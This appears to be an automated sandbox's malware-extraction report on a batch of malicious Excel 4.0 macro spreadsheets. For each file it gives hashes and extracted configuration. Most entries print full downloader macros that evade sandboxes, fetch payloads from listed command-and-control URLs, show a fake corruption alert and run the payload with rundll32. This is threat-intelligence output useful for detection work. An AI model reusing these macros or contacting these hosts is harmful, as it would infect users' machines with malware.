{"version":"0.2","sample":{"sample":"","kind":"file","target":"166e74a958e76ee50f889b092efa506e3b659bed1c3d82dfbcc95b90792a6746"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"166e74a958e76ee50f889b092efa506e3b659bed1c3d82dfbcc95b90792a6746","filesize":221184,"md5":"a4f33d6c32e7113c1a70e5f8f387d5ab","sha1":"32a3472c438460a3d032b845ebd6a9c906358fa2","sha256":"166e74a958e76ee50f889b092efa506e3b659bed1c3d82dfbcc95b90792a6746","sha512":"ecb21a0489e597ae711ca04097ab46b92e80dd8b91eb14c77b8e5d93be4bd0372e56733eb33390a3ac41076b00bf2134d4d3a4db945a3be1ce61b9535b014bef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"166e74a958e76ee50f889b092efa506e3b659bed1c3d82dfbcc95b90792a6746.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FittEFrAdI\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"167a0b74e3b0c51295a1f1e0eb2ac25a66a9971c9b9c5e30496a64b8d0363bc6"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"167a0b74e3b0c51295a1f1e0eb2ac25a66a9971c9b9c5e30496a64b8d0363bc6","filesize":185344,"md5":"919027389341bc0dc7ffa302a6fb70fe","sha1":"08627e4fa49d1fcdce17acc53f8417abb2793824","sha256":"167a0b74e3b0c51295a1f1e0eb2ac25a66a9971c9b9c5e30496a64b8d0363bc6","sha512":"ea4e45f8596c8ad5b625403f38040b0763b6d87a93cbf7f20d6258ed4fdd45e9edf9894e15b3e371715aa71bae5ec3e5f191555730b89df73f2bfa5ee6b76e40","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"167a0b74e3b0c51295a1f1e0eb2ac25a66a9971c9b9c5e30496a64b8d0363bc6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"16b9d9fcc50e4a842e8be99ea6bec229f328aa3a61e0bf9eb1a3bfcb3e328b13"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"16b9d9fcc50e4a842e8be99ea6bec229f328aa3a61e0bf9eb1a3bfcb3e328b13","filesize":167936,"md5":"5f1f6f394caacbe896598ee0f3049bee","sha1":"5cdf76604a0a4873bd7d80a6ac3c6fee67caeed4","sha256":"16b9d9fcc50e4a842e8be99ea6bec229f328aa3a61e0bf9eb1a3bfcb3e328b13","sha512":"40d4834b13659bdadabf5fde264db839bc9a2fde639533930a9e3e973f099964dbf361a1ba2358396fdd175b8656abf83120be371143622251f2863e5328dc22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"16b9d9fcc50e4a842e8be99ea6bec229f328aa3a61e0bf9eb1a3bfcb3e328b13.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"skD4eGDWSr\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"16c9bacd2899d5a549372e1c6535df45f9ee7845cfc49e0263a3890d7cfa938a"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"16c9bacd2899d5a549372e1c6535df45f9ee7845cfc49e0263a3890d7cfa938a","filesize":206336,"md5":"ae855bb64bc953518b0b64a3d0b41c51","sha1":"b94081f9c2b1a6c3db11c6f535459b2c04dbab9f","sha256":"16c9bacd2899d5a549372e1c6535df45f9ee7845cfc49e0263a3890d7cfa938a","sha512":"a8fae484b19d3f38257481e675987ce416e6e7f6fd62d5cc2e1327d55ecd2a5159d6ee39eec27fc766e250de8187ffe3e8a7c5746cd903c444bad30268175f9f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"16c9bacd2899d5a549372e1c6535df45f9ee7845cfc49e0263a3890d7cfa938a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nVPZeTMY72\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"16ca5387afa49e5ee5a1de81c64094f9e4d162e23cee854a17d9dd1636280325"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"16ca5387afa49e5ee5a1de81c64094f9e4d162e23cee854a17d9dd1636280325","filesize":225280,"md5":"60761e584cfb58b789a586afd2c0fd9c","sha1":"3220b943fc825cf74d0bbc60cb33e95a2ca099bf","sha256":"16ca5387afa49e5ee5a1de81c64094f9e4d162e23cee854a17d9dd1636280325","sha512":"f0e5a861718d7397e5b081302f9756de980f2e5ec9cda166320559d9a477b0a8efcefcc12c3ae04b46b10ec0b8ad20d09936bdf9108a463a0251f07d137fc901","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"16ca5387afa49e5ee5a1de81c64094f9e4d162e23cee854a17d9dd1636280325.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"G3PNyX148q\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"16cc4b668b2fe839dce907343ec9f7a8e67b96b147402877b1539a3a9671451e"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"16cc4b668b2fe839dce907343ec9f7a8e67b96b147402877b1539a3a9671451e","filesize":206336,"md5":"888da39d7971e6a921789a16a4ade838","sha1":"76468d2f550ec0c727798bd767fddaeff8e9456e","sha256":"16cc4b668b2fe839dce907343ec9f7a8e67b96b147402877b1539a3a9671451e","sha512":"52227db0221a2b1984e9bc00ac182b9af16acc492500d5058ca4ad1c46c338f4821cbdc8208bfb5cb6385381a3f6caa2bc15a6ec9c45c673b07139b95b549858","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"16cc4b668b2fe839dce907343ec9f7a8e67b96b147402877b1539a3a9671451e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"o1TI5wyrVV\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17024969c0c10cbae42952adba8c5c208dbe485100bb6d5e17bd2c18edd3e48f"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"17024969c0c10cbae42952adba8c5c208dbe485100bb6d5e17bd2c18edd3e48f","filesize":112128,"md5":"8b2d43d05d3d3d5e54f69af3023e316c","sha1":"e8ed2c1c127ba635ccbd72fe63582f89946df620","sha256":"17024969c0c10cbae42952adba8c5c208dbe485100bb6d5e17bd2c18edd3e48f","sha512":"3e6ccb2458c0beab566b8257d3c93ff2ee63f0feafcf36ba11f888f661075d6990c3771d5a335457c3e5a07df4d68ff9bf0be4a303958cbdc5fe924c1334dd76","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17024969c0c10cbae42952adba8c5c208dbe485100bb6d5e17bd2c18edd3e48f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"170b4ddc50e479fc45194bf011b125de4883f8dc7dd40b8fa2d5515504abe20d"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"170b4ddc50e479fc45194bf011b125de4883f8dc7dd40b8fa2d5515504abe20d","filesize":212992,"md5":"43fa2d5960e22dcce22e10e03b5d0c56","sha1":"ded031ccd68e992d1400b9954a19552a04cdfc79","sha256":"170b4ddc50e479fc45194bf011b125de4883f8dc7dd40b8fa2d5515504abe20d","sha512":"f4bfa1f5205d2662d01255ac3f5a43cf4c15a90a532d730e6970f1d0843195ec584ba11d367fa62c76e3678cd7b9b7d71b1593517f88dfbcb3605e02e2a4fda3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"170b4ddc50e479fc45194bf011b125de4883f8dc7dd40b8fa2d5515504abe20d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Kfu7SLR0IM\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1726b38cdc9e08c1b61174fbbff8bd811748fdd66aa547fef40cdc998fe196d3"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"1726b38cdc9e08c1b61174fbbff8bd811748fdd66aa547fef40cdc998fe196d3","filesize":206336,"md5":"a1d99b2e1e04874f536579aa35732cfc","sha1":"d538d9137ed7f7962397db6b7dab2709aeff4691","sha256":"1726b38cdc9e08c1b61174fbbff8bd811748fdd66aa547fef40cdc998fe196d3","sha512":"c33e1118cedae3b0eae916bf61d1be7c966367da7df625bc2a08ba8b359668547ae543f10e3cc8f31d2c3f1a2600a7bfbb4988a93096d7694d0956cbe0f40adc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1726b38cdc9e08c1b61174fbbff8bd811748fdd66aa547fef40cdc998fe196d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"B6QgskSfIK\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17344c5a26ea632f6a2758d41c4206bb89e713ee7b664163e00f82c7553510d6"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"17344c5a26ea632f6a2758d41c4206bb89e713ee7b664163e00f82c7553510d6","filesize":209408,"md5":"8b6e99e8ce964e1cc90dbf2525b6b9fd","sha1":"a44ac258d313437a8a1d66481a58a07a3918f0ae","sha256":"17344c5a26ea632f6a2758d41c4206bb89e713ee7b664163e00f82c7553510d6","sha512":"2e44997b913827b44357ac74207b224c27cb4cc77ed0f07324c161bb2e9d858577a4a55ecae3f951641b61be89029fb5882eee1685b410540f19831917ae2311","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17344c5a26ea632f6a2758d41c4206bb89e713ee7b664163e00f82c7553510d6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NgEFvz44AG\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1741d37478aedb48c6af48f45500ba87eadb3cfc4037a9167a31ecec092a86e3"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"1741d37478aedb48c6af48f45500ba87eadb3cfc4037a9167a31ecec092a86e3","filesize":214528,"md5":"f424dff09823fad5d74ef8b1756a526b","sha1":"dcad529c1d789e8ba087ec70e575e9b965857899","sha256":"1741d37478aedb48c6af48f45500ba87eadb3cfc4037a9167a31ecec092a86e3","sha512":"1e569ac32612c77331a38aa517d88f962e7adb549185e0c1e1a37c8ebcb13921313a4de15e9231fa7ae7158d828de5ff782a309f84e4c4e77231f1e624debd32","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1741d37478aedb48c6af48f45500ba87eadb3cfc4037a9167a31ecec092a86e3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YLduHPZl5v\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1753e6b5e5511a402f2de1753cfb5ed268f9059856861ce1901d952639ea3d5a"},"analysis":{"reported":"2020-04-09T16:15:03Z","score":10},"files":[{"filename":"1753e6b5e5511a402f2de1753cfb5ed268f9059856861ce1901d952639ea3d5a","filesize":185344,"md5":"0a3e52695698e2d4b374f16077e02d49","sha1":"1b5ad292ccd1c441f0fc2fd2180b7e82f65b1f36","sha256":"1753e6b5e5511a402f2de1753cfb5ed268f9059856861ce1901d952639ea3d5a","sha512":"5c349a6b40946b9e7dc04c47357e6749751fb3762f9333c9bcf01a3f2cafaafcb8fa96d2651f53310afd74ec5892f85bdd70903f70026661ceb334e5d4a97e6b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1753e6b5e5511a402f2de1753cfb5ed268f9059856861ce1901d952639ea3d5a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17701b455ff29f97308422e629ffdbff086f2d09e5aacb02094a89fbb5ca8fe4"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17701b455ff29f97308422e629ffdbff086f2d09e5aacb02094a89fbb5ca8fe4","filesize":209920,"md5":"2252068a1c1208a1e3ba5e6d3383eb40","sha1":"8de7040f579b84f6a8e9a367b8fac36fd69291e5","sha256":"17701b455ff29f97308422e629ffdbff086f2d09e5aacb02094a89fbb5ca8fe4","sha512":"8526d0ad3d55ed31e2067235f21d3c52d1f4289c1eb90a77e79380058df1c19bc491cc73da4a5582a4fe85af71e18086a692181563141c88a839874ce92c5c13","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17701b455ff29f97308422e629ffdbff086f2d09e5aacb02094a89fbb5ca8fe4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"isz6eMFl6v\",TRUE)\nGOTO(R$0C$16)"}}}]}
